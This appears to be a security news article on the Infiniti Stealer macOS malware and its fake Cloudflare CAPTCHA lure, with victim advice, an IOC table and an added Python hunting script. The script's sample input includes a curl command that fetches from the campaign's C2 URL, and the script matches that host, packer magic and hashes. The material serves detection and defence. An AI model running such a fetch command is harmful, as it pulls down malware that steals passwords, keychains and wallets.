Security researchers have recently identified a new macOS information stealer, initially dubbed NukeChain, now known as Infiniti Stealer. This malware is designed to extract sensitive information from Mac users, employing a rather insidious method that circumvents traditional security measures.
Rather than relying on intricate software exploits, Infiniti Stealer utilizes a social engineering tactic referred to as ClickFix. This approach deceives victims into unwittingly infecting their own systems. The attack commences with a counterfeit Cloudflare human verification page, which is hosted on malicious websites.
The convincing fake CAPTCHA prompts users to open the macOS Terminal and paste a specific command to "verify" that they are human. Because the user runs the command themselves, the malware never has to exploit a vulnerability, and conventional defenses such as antivirus software and exploit blockers are sidestepped.
The Infection Process and Payload
Upon pasting the command into their Terminal, victims trigger a three-stage infection process. The first stage involves a Bash dropper script that downloads and decodes a hidden payload from the attacker’s server. This script saves a new file in the temporary folder, removes Apple’s protective quarantine flag, and initiates the next stage in the background, all while swiftly closing the Terminal window.
The second stage introduces a Nuitka loader, specifically crafted for Apple Silicon Macs. Unlike typical Python malware, Nuitka compiles Python code into a native application, significantly complicating detection and analysis by security tools. This loader decompresses a substantial embedded data file and activates the final malicious stage.
The ultimate payload is the Infiniti Stealer itself, which seeks to harvest a wide array of personal data, including browser passwords, macOS Keychain entries, cryptocurrency wallets, and plain-text developer secrets. Additionally, it has the capability to capture screenshots of the compromised machine.
The emergence of Infiniti Stealer underscores a troubling trend: macOS is increasingly becoming a prime target for malware operators. If you have recently entered a command into your Terminal to bypass a CAPTCHA, it is crucial to assume that your device may be compromised. No legitimate website would ever request Terminal access for identity verification.
If you suspect that your system has been infected, it is imperative to take immediate action to safeguard your digital presence:
- Cease using the infected Mac for any sensitive activities, such as banking or work.
- Change your passwords using a completely different device.
- Revoke access to active sessions, API tokens, and SSH keys.
- Inspect your system for suspicious files hidden in temporary folders or launch agents.
- Conduct a full scan with reputable security software to eliminate any lingering malware.
For security professionals and threat hunters, monitoring specific technical footprints is essential to track this malware. Below are the primary Indicators of Compromise (IOCs) associated with the Infiniti Stealer campaign:
| Type | Value |
|---|---|
| MD5 Dropper | da73e42d1f9746065f061a6e85e28f0c |
| SHA256 Stage-3 | 1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958 |
| C2 Domain | update-check[.]com |
| C2 URL | https://update-check[.]com/m/7d8df27d95d9 |
| C2 Panel | Infiniti-stealer[.]com |
| Packer Magic | 4b 41 59 28 b5 2f fd (KAY + zstd) |
| Debug Log | /tmp/.bs_debug.log |
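The footprints described above (the stage-1 dropper's debug log, the KAY + zstd packer header, the published hashes and C2 domains) can be checked on a host with a small hunting script. The following is an added example written for this article, not code from the researchers or the malware; the function names and the sample history lines are constructed for illustration.

```python
import hashlib
import os

# Indicators copied from the IOC table above; defanged "[.]" is normalised to "."
# at match time so the sets can be compared against real shell-history lines.
PACKER_MAGIC = bytes.fromhex("4b4159" + "28b52ffd")   # "KAY" + zstd frame magic
IOC_MD5 = {"da73e42d1f9746065f061a6e85e28f0c"}
IOC_SHA256 = {"1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958"}
IOC_DOMAINS = {"update-check.com", "infiniti-stealer.com"}
DEBUG_LOG = "/tmp/.bs_debug.log"


def scan_bytes(data):
    """Return the IOC types a file's content matches: packer header and/or known hashes."""
    findings = []
    if data.startswith(PACKER_MAGIC):
        findings.append("packer-magic")
    if hashlib.md5(data).hexdigest() in IOC_MD5:
        findings.append("md5-ioc")
    if hashlib.sha256(data).hexdigest() in IOC_SHA256:
        findings.append("sha256-ioc")
    return findings


def scan_file(path):
    """Read one file (e.g. something dropped under /tmp) and scan its bytes."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())


def scan_history(lines):
    """Return shell-history lines that reference a listed C2 domain.

    A hit here usually means a ClickFix command was pasted into the Terminal.
    """
    hits = []
    for line in lines:
        normalised = line.replace("[.]", ".").lower()
        if any(domain in normalised for domain in IOC_DOMAINS):
            hits.append(line)
    return hits


def debug_log_present():
    """The dropper's debug log is a cheap on-host tell; True means investigate further."""
    return os.path.exists(DEBUG_LOG)


if __name__ == "__main__":
    # Constructed sample history: only the second line references a listed C2 domain.
    print(scan_history(["ls -la", "curl -fsSL https://update-check.com/m/7d8df27d95d9"]))
```

A real hunt would feed `scan_file` every file under the temporary folders and launch-agent directories mentioned in the cleanup list, and `scan_history` the contents of `~/.zsh_history` or `~/.bash_history`.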